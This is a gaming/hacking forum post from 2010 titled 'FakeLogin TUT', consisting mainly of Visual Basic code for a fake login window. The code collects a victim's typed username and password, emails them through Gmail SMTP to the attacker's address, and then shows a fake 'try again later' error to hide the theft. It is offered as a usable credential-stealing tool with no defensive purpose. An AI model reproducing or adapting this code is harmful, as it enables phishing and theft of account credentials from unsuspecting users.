Kurai-Gaming
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Kurai-Gaming talk about new stuffs, new hacks, and discuss about everything!
 
HomeLatest imagesSearchRegisterLog in
Tell your friends about Kurai-Gamerz.tk! | Discuss here about everything! | Donate for us to keep the site alive!

 

 FakeLogin TUT

Go down 
AuthorMessage
KuraiYusu
Admin
KuraiYusu


Posts : 21
Points : 100
Thanks : 0
Join date : 2010-05-24
Age : 39

FakeLogin TUT Empty
PostSubject: FakeLogin TUT   FakeLogin TUT EmptyThu Jul 15, 2010 4:58 pm



[CODE]

If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("YOur gmail", "You gmail password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Probeer later opnieuw!", MsgBoxStyle.Critical, "ERROR!")

Best Regards,

KuraiYusu -[Dodge This...]-
Back to top Go down
http://kurai-gamerz.tk
 
FakeLogin TUT
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Kurai-Gaming :: Visual Basic/Photoshop/Programs :: Visual Basic Area-
Jump to: